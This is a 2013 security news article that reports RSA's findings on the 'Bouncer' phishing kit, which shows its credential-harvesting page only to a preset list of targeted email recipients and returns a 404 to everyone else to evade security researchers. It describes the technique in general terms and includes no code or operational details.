Bouncer Phishing Kit Limits Users

Thursday, January 17, 2013 @ 04:01 PM gHale

There is a new type of phishing kit that allows cybercriminals to ensure only certain users can access their phishing websites. Because only users that are on “the list” can access the site, the crime kit’s name: “Bouncer.”

The bouncer phishing kit relies on a preset list of emails. A unique URL, representing a user ID value, goes out to each of the recipients, said researchers at RSA.

Fighting Back Against Spear Phishing
Spear Phishing Continues Growth Curve
Phishing Report: Comparing Browsers
Browser Add-On Goes Phishing

Acting in a manner somewhat similar to targeted marketing, when someone that’s not on the list attempts to access the phishing page, they end up redirected to a “404 page not found” webpage.

Some older phishing kits employ similar techniques, but they restrict access based on IP addresses, while the bouncer is actually a black hat whitelist.

“When victims access the phishing link, their name has to be on the list and their ‘ID’ value is verified on-the-fly as soon as they attempt to browse to the URL. After a scan of the ‘bouncer list’, unintended visitors are stirred away from the phishing page; in fact, the page is not even generated for eyes it was not meant for,” said RSA’s Limor Kessem.

Users who end up allowed to access the site get an attack page generated by the kit. Their credentials go out to a different hijacked website.

“Another thing that makes this different is that traditional phishers like to cast as wide of a net as possible, but with this tactic the phisher is laser-focusing the campaign in an effort to collect only the most pertinent credentials for his purposes. Keeping out uninvited guests also means avoiding security companies and prompt take-downs of such attacks,” Kessem added.

The campaigns analyzed by RSA targeted, in average, 3,000 recipients. The targets appeared to be webmail users, corporate email recipients and even bank employees.

Experts warn these types of kits can be successful in spear phishing campaigns.

Leave a Reply

You must be logged in to post a comment.